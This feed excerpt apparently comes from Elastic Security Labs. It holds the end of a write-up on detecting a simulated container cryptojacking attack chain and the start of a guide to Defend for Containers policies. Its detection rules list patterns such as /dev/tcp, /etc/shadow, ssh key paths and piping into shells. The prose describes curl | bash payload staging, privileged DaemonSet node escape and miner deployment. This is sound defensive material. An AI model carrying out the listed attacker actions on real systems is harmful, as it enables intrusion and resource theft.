<p>For the creation of base64 encoded payloads, an umbrella rule was created that detects the execution of a shell with echo/printf built-ins, and a whitelist of commonly abused command lines:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and 
process.interactive == true and process.name in (
  &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;
) and process.args == &quot;-c&quot; and process.args like (&quot;*echo *&quot;, &quot;*printf *&quot;) and 
process.args like (
  &quot;*/etc/cron*&quot;, &quot;*/etc/rc.local*&quot;, &quot;*/dev/tcp/*&quot;, &quot;*/etc/init.d*&quot;,
  &quot;*/etc/update-motd.d*&quot;, &quot;*/etc/ld.so*&quot;, &quot;*/etc/sudoers*&quot;, &quot;*base64 *&quot;, 
  &quot;*base32 *&quot;, &quot;*base16 *&quot;, &quot;*/etc/profile*&quot;, &quot;*/dev/shm/*&quot;, &quot;*/etc/ssh*&quot;, 
  &quot;*/home/*/.ssh/*&quot;, &quot;*/root/.ssh*&quot; , &quot;*~/.ssh/*&quot;, &quot;*xxd *&quot;, &quot;*/etc/shadow*&quot;,
  &quot;* /tmp/*&quot;, &quot;* /var/tmp/*&quot;, &quot;* /dev/shm/* &quot;, &quot;* ~/*&quot;, &quot;* /home/*&quot;,
  &quot;* /run/*&quot;, &quot;* /var/run/*&quot;, &quot;*|*sh&quot;, &quot;*|*python*&quot;, &quot;*|*php*&quot;, &quot;*|*perl*&quot;,
  &quot;*|*busybox*&quot;, &quot;*/var/www/*&quot;, &quot;*&gt;*&quot;, &quot;*;*&quot;, &quot;*chmod *&quot;, &quot;*rm *&quot; 
) and container.id like &quot;?*&quot;
</code></pre>
<p>Especially for interactive processes, the following detection rule is a high signal.</p>
<p>The second piece of the flow relates to the file permission changes. Not all file permission changes are malicious, but detecting file permission changes to executable files in world-writeable directories via an interactive process within a container is not expected to occur frequently.</p>
<pre><code class="language-sql">any where event.category in (&quot;file&quot;, &quot;process&quot;) and
event.type in (&quot;change&quot;, &quot;creation&quot;, &quot;start&quot;) and (
  process.name == &quot;chmod&quot; or
  (
    /*
    account for tools that execute utilities as a subprocess,
    in this case the target utility name will appear as a process arg
    */
    process.name in (
      &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;, &quot;busybox&quot;
    ) and
    process.args in (
      &quot;chmod&quot;, &quot;/bin/chmod&quot;, &quot;/usr/bin/chmod&quot;, &quot;/usr/local/bin/chmod&quot;
    )
  )
) and process.args in (&quot;4755&quot;, &quot;755&quot;, &quot;777&quot;, &quot;0777&quot;, &quot;444&quot;, &quot;+x&quot;, &quot;a+x&quot;) and
container.id like &quot;?*&quot;
</code></pre>
<p>Note that we leverage the file and process event categories here. The reason for this is that D4C captures these changes through file events if set specifically in the policy, but by default will capture these process executions when set to detect <code>execve</code> calls.</p>
<p>The final piece of this chain relates to the execution of binaries in world-writeable locations. Most container runtimes will not execute payloads from these directories.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and process.interactive == true and (
  process.executable like (
    &quot;/tmp/*&quot;, &quot;/dev/shm/*&quot;, &quot;/var/tmp/*&quot;, &quot;/run/*&quot;, &quot;/var/run/*&quot;,
    &quot;/mnt/*&quot;, &quot;/media/*&quot;, &quot;/boot/*&quot;
  ) or
  // Hidden process execution
  process.name like &quot;.*&quot;
) and container.id like &quot;?*&quot;
</code></pre>
<p>Note that the rule also captures hidden process executions. This is a technique commonly observed by threat actors as well, as they may attempt to evade detection by marking processes as hidden.</p>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml">File Execution Permission Modification Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml">Suspicious Echo or Printf Execution Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml">Suspicious Process Execution Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon miner deployment and execution:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image11.png" alt="Figure 8: Detection rules triggering for stage 8: Miner Deployment and Execution" title="Figure 8: Detection rules triggering for stage 8: Miner Deployment and Execution" /></p>
<h3>Stage 9 – Escalation to Node Control</h3>
<p>Once the attacker has a foothold inside a container and access to an overprivileged service account, the next step is to abuse the Kubernetes control plane itself. This stage moves the attack beyond a single container and into cluster-wide impact. This activity is detected via Kubernetes audit logs. The Kubernetes audit log rules surfaced by this intrusion fall into three distinct patterns.</p>
<h4>Stage 9.1 – Reconnaissance &amp; API Abuse</h4>
<p>The attacker's <code>kube.py</code> script uses the stolen service account token to enumerate pods, secrets, and nodes across all namespaces. From Kubernetes' perspective, this looks like a single identity making a burst of API calls across multiple resource types, a pattern that maps directly to permission enumeration detection logic. The use of Python's <code>urllib</code> rather than <code>kubectl</code> is also unusual as an API client.</p>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/discovery_endpoint_permission_enumeration_by_user_and_srcip.toml">Kubernetes Potential Endpoint Permission Enumeration Attempt Detected</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml">Direct Interactive Kubernetes API Request by Unusual Utilities</a></li>
</ul>
<p>Resulting in the following detection alerts upon reconnaissance and API abuse:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image7.png" alt="Figure 9: Detection rules triggering for stage 9.1: Reconnaissance &amp; API Abuse" title="Figure 9: Detection rules triggering for stage 9.1: Reconnaissance &amp; API Abuse" /></p>
<h4>Stage 9.2 – Privilege Escalation &amp; Workload Manipulation</h4>
<p>With enumeration complete, the attacker creates a privileged DaemonSet (<code>system-monitor</code>) and relies on the overprivileged ClusterRole that was bound to the compromised service account. Both the workload creation and the role that enabled it are flagged: the DaemonSet as a sensitive workload modification, and the ClusterRole binding as a sensitive role granting broad permissions, including <code>pods/exec</code>, secret access, and DaemonSet creation.</p>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml">Unusual Kubernetes Sensitive Workload Modification</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml">Kubernetes Creation or Modification of Sensitive Role</a></li>
</ul>
<p>Resulting in the following detection alerts upon privilege escalation and workload manipulation:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image13.png" alt="Figure 10: Detection rules triggering for stage 9.2: Privilege Escalation &amp; Workload Manipulation" title="Figure 10: Detection rules triggering for stage 9.2: Privilege Escalation &amp; Workload Manipulation" /></p>
<h4>Stage 9.3 – Node-Level Escape</h4>
<p>The DaemonSet's pod spec is designed to break every isolation boundary a container normally provides. It requests privileged mode, attaches to the host network and PID namespace, and mounts the node's root filesystem. Each of these properties triggers a separate detection rule, and together they paint a clear picture of a container workload engineered for node escape.</p>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml">Kubernetes Pod Created with a Sensitive hostPath Volume</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml">Kubernetes Privileged Pod Created</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml">Kubernetes Pod Created With HostNetwork</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml">Kubernetes Pod Created With HostPID</a></li>
</ul>
<p>Resulting in the following detection alerts upon node-level escape:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image3.png" alt="Figure 11: Detection rules triggering for stage 9.3: Node-Level Escape" title="Figure 11: Detection rules triggering for stage 9.3: Node-Level Escape" /></p>
<p>These three sub-stages also highlight a key boundary in container-focused detection. While D4C excels at observing what happens <em>inside</em> containers, identifying how and <em>why</em> those containers were created requires Kubernetes control-plane telemetry. In a follow-up “Kubernetes Detection Engineering” series, we will focus on correlating D4C runtime events with Kubernetes Audit logs to detect multi-stage attacks that span workload creation, privilege escalation, and node-level impact.</p>
<p>For anyone already familiar with Kubernetes audit logs or interested in learning more about them, we have several prebuilt detection rules available that leverage the Kubernetes audit log framework in our <a href="https://github.com/elastic/detection-rules/tree/main/rules/integrations/kubernetes">GitHub detection-rules repository</a>.</p>
<h3>Stage 10 – Web Server Exploitation via React2Shell</h3>
<p>In addition to exploiting compromised containers and Kubernetes control paths, TeamPCP also leverages direct web server exploitation to gain shell access on exposed services. One of the techniques referenced in related campaigns is React2Shell, where vulnerable web applications are abused to achieve remote command execution and drop into an interactive shell.</p>
<p>The attacker’s objective here is straightforward: expand access beyond Kubernetes workloads and increase the number of entry points into the environment. Web-facing services are often less strictly isolated than containers and can provide a fast path to host-level compromise if left unpatched.</p>
<p>From a detection standpoint, this activity is already well covered. Elastic provides an umbrella web server exploitation detection that flags suspicious command execution patterns originating from web server processes. In addition, multiple host-based Linux detections identify post-exploitation behavior following successful web shell access, such as unexpected shell execution, command interpreters launched by web services, and follow-on tooling execution.</p>
<p>Detecting this stage is important because it represents an alternative ingress path that bypasses container-specific defenses entirely. When correlated with earlier D4C detections, React2Shell-style exploitation helps confirm that the attacker is actively pursuing multiple avenues of access, increasing both blast radius and persistence potential.</p>
<p>The detection rule that triggered in this stage is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml">Web Server Exploitation Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon web server exploitation:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image1.png" alt="Figure 12: Detection rules triggering for stage 10: Web Server Exploitation via React2Shell" title="Figure 12: Detection rules triggering for stage 10: Web Server Exploitation via React2Shell" /></p>
<p>What makes this scenario effective as a detection exercise is that every major objective of the attacker (execution, persistence, propagation, and monetization) manifests as runtime behavior inside containers. D4C's ability to observe that behavior in context allows detection engineers to follow the attack as it unfolds, rather than discovering it only after the damage is done.</p>
<h2>Tying It All Together with Attack Discovery</h2>
<p>Running individual detection rules across container runtime and Kubernetes audit telemetry produces dozens of alerts, each highlighting a single suspicious action in isolation. A defender reviewing these one by one would see a privileged pod here, a <code>curl | bash</code> there, and a burst of API enumeration somewhere else. The challenge is not generating alerts; it is recognizing that these 130+ signals are all part of the same operation.</p>
<p>This is where <a href="https://www.elastic.co/docs/solutions/security/ai/attack-discovery">Attack Discovery</a> comes in. Attack Discovery is Elastic's generative AI capability that ingests a set of alerts and automatically correlates them into coherent attack narratives. Rather than forcing an analyst to manually pivot between individual alerts, it identifies which signals belong together and maps them to the MITRE ATT&amp;CK framework, producing a single, readable summary of what happened.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image6.png" alt="Figure 13: Attack Discovery analysis of the whole TeamPCP attack chain" title="Figure 13: Attack Discovery analysis of the whole TeamPCP attack chain" /></p>
<p>When pointed at the alerts generated by this simulation, Attack Discovery correctly reconstructed the full TeamPCP kill chain as a “Container Cryptojacking Attack Chain”. The summary identified:</p>
<ul>
<li><strong>Initial Access:</strong> Web server exploitation on the victim node, where <code>busybox</code> spawned from <code>python3.11</code> and executed reconnaissance commands (<code>id</code>, <code>whoami</code>, <code>uname -a</code>, <code>cat /etc/passwd</code>)</li>
<li><strong>Privilege Escalation:</strong> The <code>system:serviceaccount:kube-system:daemon-set-controller</code> is creating highly privileged pods with <code>HostPID</code>, <code>HostNetwork</code>, privileged mode, and sensitive <code>hostPath</code> volume mounts</li>
<li><strong>Defense Evasion:</strong> Competitor cryptominer cleanup via <code>pkill -9 xmrig</code> and <code>pkill -9 XMRig</code>, alongside base64-encoded Python payloads</li>
<li><strong>Tool Staging:</strong> Runtime package installation (<code>apk</code>, <code>curl</code>, <code>bash</code>, <code>python3</code>) and malicious script download via <code>curl</code> from the simulated C2 server</li>
<li><strong>C2 Infrastructure:</strong> Deployment of tunneling tools <code>gost</code> and <code>frpc</code> under <code>/opt/teampcp</code>, with a SOCKS5 proxy listening on port 1081</li>
<li><strong>Impact:</strong> A decoded and staged <code>/tmp/miner</code> binary: the cryptojacking objective</li>
</ul>
<p>The attack chain visualization maps the correlated alerts across the full MITRE ATT&amp;CK kill chain, from Initial Access through to Impact, with confirmed activity in Execution, Privilege Escalation, Defense Evasion, Discovery, and Command &amp; Control.</p>
<p>This is the payoff of combining D4C runtime telemetry with Kubernetes audit logs. Neither data source alone would produce this picture: container runtime sees the <code>curl | bash</code>, the <code>gost</code> process, and the miner binary, while the audit logs capture the DaemonSet creation, the RBAC abuse, and the API enumeration. Attack Discovery fuses both into a single narrative that a SOC analyst can act on immediately, without manually stitching together alerts across different indices and timeframes.</p>
<h2>Conclusion</h2>
<p>Across this attack chain, we observed a consistent pattern. Interactive execution within containers led to environment discovery, lateral movement via Kubernetes APIs, attempts at persistence in locations inconsistent with container design, installation of runtime tooling, tunneling activity, reconstruction of encoded payloads, and, finally, resource monetization. Each objective produced distinct runtime signals.</p>
<p>Defend for Containers’ value lies in surfacing these signals with the container and orchestration context attached. Process lineage, capability metadata, interactive execution flags, file modification telemetry, and container identity together allow detections to move beyond simple command matching and instead reason about intent and impact.</p>
<p>This scenario also highlights an important architectural boundary. While D4C provides deep runtime visibility inside containers, certain escalation steps, such as privileged workload creation or control-plane manipulation, require Kubernetes audit log telemetry for full visibility. Effective cloud-native detection, therefore, depends on combining runtime and control-plane data sources.</p>
<p>In the next phase of this series, we will extend this model beyond the container boundary and explore Kubernetes control-plane detection engineering, correlating audit logs with D4C runtime events to detect multi-stage attacks that span workloads, nodes, and the cluster itself.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/teampcp-container-attack-scenario.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Linux & Cloud Detection Engineering - Getting Started with Defend for Containers (D4C)]]></title>
            <link>https://www.elastic.co/security-labs/getting-started-with-defend-for-containers</link>
            <guid>getting-started-with-defend-for-containers</guid>
            <pubDate>Thu, 19 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This technical resource provides a comprehensive walkthrough of Elastic’s Defend for Containers (D4C) integration, covering Kubernetes-based deployment, the analysis of BPF-enriched runtime telemetry, and the practical application of policy-driven security controls to monitor and alert on activities within containerized Linux environments.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>Linux systems remain a critical foundation for modern infrastructure, particularly in cloud-native environments where containers and orchestration platforms are the norm. As workloads move from long-lived hosts to ephemeral containers, attacker tradecraft shifts as well. Activity that once left persistent artifacts on disk is increasingly confined to short-lived, runtime behavior that can be difficult to capture using traditional log sources.</p>
<p>Detection engineering in these environments, therefore, depends heavily on runtime visibility. Understanding how processes execute inside containers, how files are accessed, and how workloads interact with the host becomes more important than relying on static indicators or post-incident artifacts.</p>
<p>Elastic provides several Linux-focused telemetry sources to support this type of detection work. In <a href="https://www.elastic.co/security-labs/linux-detection-engineering-with-auditd">earlier posts in this series</a>, we focused on host-level visibility using Auditd and Auditd Manager, showing how low-level system events can be translated into high-fidelity detections. In this post, the focus shifts to Elastic’s Defend for Containers: a runtime security integration built specifically for containerized Linux workloads.</p>
<p>The goal of this article is not to document every Defend for Containers feature, but to provide a practical starting point for detection engineers: what data the integration produces and how to reason about that data. In the next part, we will look into how it can be applied to realistic container attack scenarios.</p>
<h2>Streamlined visibility with Defend for Containers</h2>
<p>We are excited to announce the arrival of Defend for Containers in the 9.3.0 release. This integration brings a streamlined approach to container security, offering a strong foundation for visibility in cloud-native infrastructures. Users can leverage a suite of detection rules tailored to defend against modern Kubernetes threats and container-specific vulnerabilities. The arrival of Defend for Containers is accompanied by <a href="https://github.com/elastic/detection-rules/tree/main/rules/integrations/cloud_defend">a container-specific detection ruleset</a>, designed around realistic container and Kubernetes threat models.</p>
<p>At the time of writing, the Defend for Containers ruleset provides baseline coverage for common container attack techniques, including reconnaissance activity, credential access attempts, kubelet attacks, service account token abuse, interactive process execution, file creation and modification, interpreter abuse, encoded payload execution, tooling installation, tunneling behavior, and multiple privilege escalation vectors. Importantly, all existing container- and Kubernetes-specific detection rules <a href="https://github.com/elastic/detection-rules/pull/5685">have been made compatible with Defend for Containers</a>, allowing previously host-centric logic to operate directly on container runtime telemetry.</p>
<p>This makes Defend for Containers a practical and immediately usable data source for Linux detection engineers focused on behavior-driven runtime detection. The remainder of this post focuses on how that telemetry looks in practice and how it can be applied to real-world container attack scenarios.</p>
<h2>Introduction to Defend for Containers</h2>
<p><a href="https://www.elastic.co/docs/reference/integrations/cloud_defend">Defend for Containers</a> is a runtime security integration that provides visibility into Linux containers as they execute. Instead of relying on static image scanning or post-execution logs, it focuses on observing container behavior in real time.</p>
<p>At a high level, Defend for Containers captures security-relevant runtime events from running containers, such as process execution and file access. These events are enriched with container and orchestration context and shipped into Elasticsearch, where they can be analyzed and used as input for detection rules.</p>
<p>From a detection engineering perspective, Defend for Containers sits at the intersection of traditional Linux behavior and the container context. Processes, syscalls, and file activity remain core signals, but they are now scoped to containers, namespaces, and workloads that may only exist briefly.</p>
<p>Defend for Containers is deployed as part of the Elastic Agent and integrates directly with Elastic Security. Once enabled, it provides a dedicated stream of container runtime events that can be queried using KQL or ES|QL, or consumed directly by detection analytics. This allows detection engineers to apply familiar analysis techniques while accounting for the operational realities of cloud-native workloads.</p>
<p>In the sections that follow, we will examine Defend for Containers events in more detail and walk through several container attack scenarios to illustrate how this data can be used in practice.</p>
<h3>Defend for Containers setup</h3>
<p>Before you can take advantage of Defend for Containers' runtime visibility and analytics, you need to deploy the integration and configure a policy that defines which events to observe and what actions to take when matching activity is encountered. More information about the integration and its setup can be found <a href="https://www.elastic.co/docs/reference/integrations/cloud_defend">here</a>. At a high level, this setup consists of:</p>
<ol>
<li>Deploying the Defend for Containers integration via Elastic Agent in your Kubernetes environment.</li>
<li>Configuring or customizing the Defend for Containers policy, which consists of selectors that define which operations to match and responses that define what actions to take.</li>
<li>Validating and refining the policy based on observed workload behavior.</li>
</ol>
<h3>Deployment methods</h3>
<p>Defend for Containers is delivered as an Elastic Agent integration and relies on Elastic Agent to collect and forward container runtime telemetry into your Elastic Stack. For Kubernetes workloads, you install the integration via the Elastic Security UI and then enroll agents on your cluster nodes.</p>
<p>The basic deployment flow is:</p>
<p>In the Elastic Security UI, navigate to <a href="https://www.elastic.co/docs/reference/fleet">Fleet</a> and create a new Agent Policy (or add the integration to an existing one). Once the Agent Policy is created, we can add the “Defend for Containers” integration to the policy.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image1.png" alt="Figure 1: Add the integration to the agent policy view" title="Figure 1: Add the integration to the agent policy view" /></p>
<p>Give the integration a name and optionally adjust the default selectors and responses (we will look into the available options further down in this publication). Once “Add integration” is selected, a new Agent Policy with the correct integration should be available.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image5.png" alt="Figure 2: Agent policy integrations overview" title="Figure 2: Agent policy integrations overview" /></p>
<p>For this demonstration, we will leverage the Kubernetes deployment method. To deploy this policy to a workload, we can navigate to Actions → Add agent → Kubernetes. Here, we see instructions for copying or downloading the Kubernetes manifest.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image19.png" alt="Figure 3: Defend for Containers Kubernetes manifest overview" title="Figure 3: Defend for Containers Kubernetes manifest overview" /></p>
<p>An important note to be aware of is: “<em>Note that the following manifest contains resource limits that may not be appropriate for a production environment. Review our guide on <a href="https://www.elastic.co/docs/reference/fleet/scaling-on-kubernetes#_specifying_resources_and_limits_in_agent_manifests">Scaling Elastic Agent on Kubernetes</a> before deploying this manifest.</em>”</p>
<p>You will need to include the following <code>capabilities</code> under <code>securityContext</code> in your Kubernetes YAML for the service to work:</p>
<pre><code class="language-yaml">securityContext:
    runAsUser: 0
    capabilities:
      add:
        - BPF ## Enables both BPF &amp; eBPF
        - PERFMON
        - SYS_RESOURCE
</code></pre>
<p>After copying or downloading the provided <code>elastic-agent-managed-kubernetes.yml</code> manifest, you can edit the manifest as needed, and apply the manifest with:</p>
<pre><code class="language-bash">kubectl apply -f elastic-agent-managed-kubernetes.yml
</code></pre>
<p>As also mentioned in the manifest, review the guide “<a href="https://www.elastic.co/docs/reference/fleet/running-on-kubernetes-managed-by-fleet">Run Elastic Agent on Kubernetes managed by Fleet</a>” for more deployment information.</p>
<p>Wait for the Elastic Agent pods to schedule and for data to begin flowing into Elasticsearch.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image16.png" alt="Figure 4: Defend for Containers integration input overview" title="Figure 4: Defend for Containers integration input overview" /></p>
<p>Once deployed, Elastic Agent will establish a connection to Fleet, enroll under the selected policy, and begin emitting Defend for Containers telemetry that Elastic Security can consume.</p>
<p>In the next section, we will take a look at the integration configuration options and explore which features are available to use.</p>
<h3>Defend for Containers policies</h3>
<p>At the heart of Defend for Containers' configuration is the policy. Policies determine what activity to observe and how to respond when matching events occur. Policies are composed of two fundamental building blocks:</p>
<ul>
<li><strong>Selectors:</strong> define which events are of interest by specifying operations and conditions;</li>
<li><strong>Responses:</strong> define what actions to take when a selector’s conditions are met.</li>
</ul>
<p>Defend for Containers policies can be edited before deployment or modified post-deployment via the Elastic Security UI’s policy editor.</p>
<h4>Policy structure</h4>
<p>Each policy must contain at least one selector and at least one response. A typical selector specifies one or more operations (such as process events or file activities) and uses conditions (like container image name, namespace, or pod label) to narrow the scope. Responses reference selectors and indicate what action to take when events match.</p>
<p>The default Defend for Containers policy includes two selector-response pairs: “Threat Detection” and “Drift Detection &amp; Prevention”.</p>
<p><strong>Threat detection:</strong> A <code>selector</code> named <code>allProcesses</code> matches all <code>fork</code> and <code>exec</code> events from containers.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image13.png" alt="Figure 5: Defend for Containers allProcesses selector" title="Figure 5: Defend for Containers allProcesses selector" /></p>
<p>And the associated <code>response</code> has the action set to <code>Log</code>, ensuring that events are ingested and can be analyzed.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image11.png" alt="Figure 6: Defend for Containers allProcesses log response" title="Figure 6: Defend for Containers allProcesses `log` response" /></p>
<p><strong>Drift detection &amp; prevention:</strong> A selector named <code>executableChanges</code> matches <code>createExecutable</code> and <code>modifyExecutable</code> operations.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image7.png" alt="Figure 7: Defend for Containers executableChanges selector" title="Figure 7: Defend for Containers executableChanges selector" /></p>
<p>And the response is configured to create alerts (and can be modified to block those operations).</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image18.png" alt="Figure 8: Defend for Containers executableChanges alert response" title="Figure 8: Defend for Containers executableChanges `alert` response" /></p>
<p>These can be modified via the UI, but under the hood, these policies are simple YAML configuration files that can be easily modified and used in any CI|CD flows:</p>
<pre><code class="language-yaml">process:
  selectors:
    - name: allProcesses
      operation:
        - fork
        - exec
  responses:
    - match:
        - allProcesses
      actions:
        - log
file:
  selectors:
    - name: executableChanges
      operation:
        - createExecutable
        - modifyExecutable
  responses:
    - match:
        - executableChanges
      actions:
        - alert
</code></pre>
<p>Next, we will take a look at some example selectors and responses and discuss the options you have for setting up the integration to your liking.</p>
<p><strong>Example selector snippet</strong></p>
<p>Selectors allow fine-grained matching using conditions on fields such as:</p>
<ul>
<li><code>containerImageFullName</code>: full image names like <code>docker.io/nginx</code>;</li>
<li><code>containerImageName</code>: partial image names;</li>
<li><code>containerImageTag</code>: specific tags like latest;</li>
<li><code>kubernetesClusterId</code>: Kubernetes cluster IDs;</li>
<li><code>kubernetesClusterName</code>: Kubernetes cluster names;</li>
<li><code>kubernetesNamespace</code>: namespaces where the workload runs;</li>
<li><code>kubernetesPodName</code>: pod names, with support for trailing wildcards;</li>
<li><code>kubernetesPodLabel</code>: label key/value pairs, with wildcard support.</li>
</ul>
<pre><code class="language-yaml">selectors:
  - name: nodeExports
    file:
      operations:
        - createExecutable
        - modifyExecutable
      containerImageName:
        - &quot;nginx&quot;
      kubernetesNamespace:
        - &quot;prod-*&quot;
</code></pre>
<p>In this example, the selector named <code>nodeExports</code> matches file events that create or modify executables within containers whose image names contain “nginx” and whose Kubernetes namespace begins with <code>“prod-”</code>.</p>
<p><strong>Example response snippet</strong></p>
<p>Responses determine what happens when selector conditions are met. Common actions include:</p>
<ul>
<li><code>log</code>: send the event as telemetry for analysis;</li>
<li><code>alert</code>: create an alert in Elastic Security;</li>
<li><code>block</code>: prevent the operation (for supported types).</li>
</ul>
<pre><code class="language-yaml">responses:
  - name: alertAndBlockNodeExports
    matchSelectors:
      - nodeExports
    actions:
      - alert
      - block
</code></pre>
<p>Here, the response named <code>alertAndBlockNodeExports</code> references the previously defined nodeExports selector and will both generate an alert and block the operation.</p>
<h4>Wildcards and matching</h4>
<p>Selectors in Defend for Containers support trailing wildcards in string-based conditions (such as pod names or image tags). This allows broad matching without enumerating every possible value. For example, a pod selector of <code>backend-*</code> will match all pods whose names begin with <code>backend-</code>, while a label condition such as <code>role:api*</code> matches label values that start with <code>api</code>.</p>
<p>This wildcarding is essential in dynamic environments where workloads scale and shift rapidly.</p>
<p>In addition to simple string matching, Defend for Containers selectors also support <strong>path-based wildcard semantics</strong> when matching file paths. Consider the following selector example:</p>
<pre><code class="language-yaml">- name:
  targetFilePath:
    - /usr/bin/echo
    - /usr/sbin/*
    - /usr/local/**
</code></pre>
<p>In this example:</p>
<ul>
<li><code>/usr/bin/echo</code> matches only the <code>echo</code> binary at that exact path.</li>
<li><code>/usr/sbin/*</code> matches everything that is a direct child of <code>/usr/sbin</code>.</li>
<li><code>/usr/local/**</code> matches everything recursively under <code>/usr/local</code>, including paths such as <code>/usr/local/bin/something</code>.</li>
</ul>
<p>These distinctions make it possible to precisely scope file-based selectors, balancing coverage and noise. In practice, they allow detection engineers to target specific binaries, entire directories, or deep directory trees, depending on the use case, without resorting to overly permissive rules.</p>
<h4>Tying it all together</h4>
<p>Up to this point, we have looked at Defend for Containers selectors, wildcard semantics, event types, and how they surface attacker behavior at runtime. The final step is to understand how these pieces come together within a policy to express real detection logic.</p>
<p>Consider the following policy fragment:</p>
<pre><code class="language-yaml">file:
  selectors:
    - name: binDirExeMods
      operation:
        - createExecutable
        - modifyExecutable
      targetFilePath:
        - /usr/bin/**
    - name: etcFileChanges
      operation:
        - createFile
        - modifyFile
        - deleteFile
      targetFilePath:
        - /etc/**
    - name: nginx
      containerImageName:
        - nginx

  responses:
    - match:
        - binDirExeMods
        - etcFileChanges
      exclude:
        - nginx
      actions:
        - alert
        - block
</code></pre>
<p>This policy defines three selectors. Two selectors (<code>binDirExeMods</code> and <code>etcFileChanges</code>) describe file system activity of interest, while the third selector (<code>nginx</code>) describes a container context to exclude.</p>
<p>The response section ties these selectors together. The selectors listed under <code>match</code> are logically <code>OR</code>’d, meaning that <em>either</em> condition is sufficient to trigger the response. The selector listed under <code>exclude</code> acts as a logical <code>NOT</code>, removing matching events when the container image is <code>nginx</code>.</p>
<p>Read in plain language, the policy expresses the following logic:</p>
<p><em>If an executable is created or modified anywhere under <code>/usr/bin</code>, <strong>or</strong> a file is created, modified, or deleted under <code>/etc</code>,  <strong>and</strong> the activity does not originate from an <code>nginx</code> container, then generate an alert and block the action.</em></p>
<p>In Boolean form, this can be expressed as:</p>
<pre><code class="language-text">IF (binDirExeMods OR etcFileChanges) AND NOT nginx
→ alert + block
</code></pre>
<p>This is where Defend for Containers policies become powerful. Rather than writing complex detection logic in a query language, selectors let you decompose behavior into small, reusable building blocks and then combine them declaratively. By mixing path-based selectors, operation types, container context, and exclusions, you can express nuanced detection logic that remains readable and maintainable.</p>
<p>In practice, this model allows detection engineers to translate threat hypotheses directly into policy logic: <em>what</em> behavior matters, <em>where</em> it occurs, <em>in which workloads</em>, and <em>what should happen</em> when it does.</p>
<h4>Policy validation and refinement</h4>
